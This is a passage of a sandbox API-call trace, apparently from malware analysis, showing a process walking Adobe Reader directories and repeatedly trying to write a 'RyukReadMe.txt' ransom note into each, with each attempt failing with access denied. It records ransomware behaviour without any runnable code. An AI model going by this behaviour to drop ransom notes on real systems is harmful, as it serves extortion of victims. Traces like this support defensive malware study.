[0138.723] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.723] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.724] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.724] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.728] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Services\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.729] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.729] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.729] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.729] SetLastError (dwErrCode=0x0) [0138.729] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\Services\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\services\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.729] GetLastError () returned 0x5 [0138.729] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.730] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.730] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.730] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.730] SetLastError (dwErrCode=0x0) [0138.730] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\tr_TR\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\tr_tr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.730] GetLastError () returned 0x5 [0138.730] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.730] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.730] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.730] SetLastError (dwErrCode=0x0) [0138.730] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.730] GetLastError () returned 0x5 [0138.730] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.731] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.731] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.732] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.732] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.735] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\Services\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.736] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.736] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.736] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.736] SetLastError (dwErrCode=0x0) [0138.736] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\Services\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\services\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.736] GetLastError () returned 0x5 [0138.736] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.736] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.736] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.737] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.737] SetLastError (dwErrCode=0x0) [0138.737] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\uk_UA\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\uk_ua\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.737] GetLastError () returned 0x5 [0138.737] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.737] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.737] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.737] SetLastError (dwErrCode=0x0) [0138.737] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.737] GetLastError () returned 0x5 [0138.737] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.737] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.737] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.739] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.739] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.745] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.745] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.745] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.745] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.746] SetLastError (dwErrCode=0x0) [0138.746] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\Services\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\services\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.746] GetLastError () returned 0x5 [0138.746] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.746] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.746] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.747] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.747] SetLastError (dwErrCode=0x0) [0138.747] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.747] GetLastError () returned 0x5 [0138.747] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.747] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.747] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.747] SetLastError (dwErrCode=0x0) [0138.747] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.751] GetLastError () returned 0x5 [0138.751] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.751] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.751] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.753] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.753] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.757] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\Services\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.757] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.757] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.757] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.757] SetLastError (dwErrCode=0x0) [0138.757] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\Services\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\services\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.757] GetLastError () returned 0x5 [0138.757] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.757] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.757] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.758] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.758] SetLastError (dwErrCode=0x0) [0138.758] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.758] GetLastError () returned 0x5 [0138.758] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.758] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.758] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0138.758] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0138.758] SetLastError (dwErrCode=0x0) [0138.758] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.758] GetLastError () returned 0x5 [0138.758] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0138.758] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.758] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.758] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.758] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.759] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.759] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.759] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0138.760] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.760] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.760] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.760] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.760] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.761] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\PMP\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.761] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.761] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.762] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.762] SetLastError (dwErrCode=0x0) [0138.762] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\PMP\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acroform\\pmp\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.763] GetLastError () returned 0x5 [0138.763] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.763] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.763] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0138.763] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.765] SetLastError (dwErrCode=0x0) [0138.765] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acroform\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.765] GetLastError () returned 0x5 [0138.765] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.765] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.765] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.765] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.766] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.766] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.766] SetLastError (dwErrCode=0x0) [0138.766] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.766] GetLastError () returned 0x5 [0138.766] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.766] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.766] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.767] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.767] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.767] SetLastError (dwErrCode=0x0) [0138.767] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.767] GetLastError () returned 0x5 [0138.767] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.767] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.767] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0138.769] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.769] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.770] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0138.771] SetLastError (dwErrCode=0x0) [0138.771] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CAT\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cat\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.774] GetLastError () returned 0x5 [0138.774] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.774] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.774] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.774] SetLastError (dwErrCode=0x0) [0138.774] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.774] GetLastError () returned 0x5 [0138.774] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.774] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.774] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0138.775] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.775] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.776] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0138.776] SetLastError (dwErrCode=0x0) [0138.776] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHS\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\chs\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.776] GetLastError () returned 0x5 [0138.776] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.776] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.776] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.776] SetLastError (dwErrCode=0x0) [0138.776] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.776] GetLastError () returned 0x5 [0138.776] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0138.776] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.776] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0138.777] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.777] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0138.778] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0138.778] SetLastError 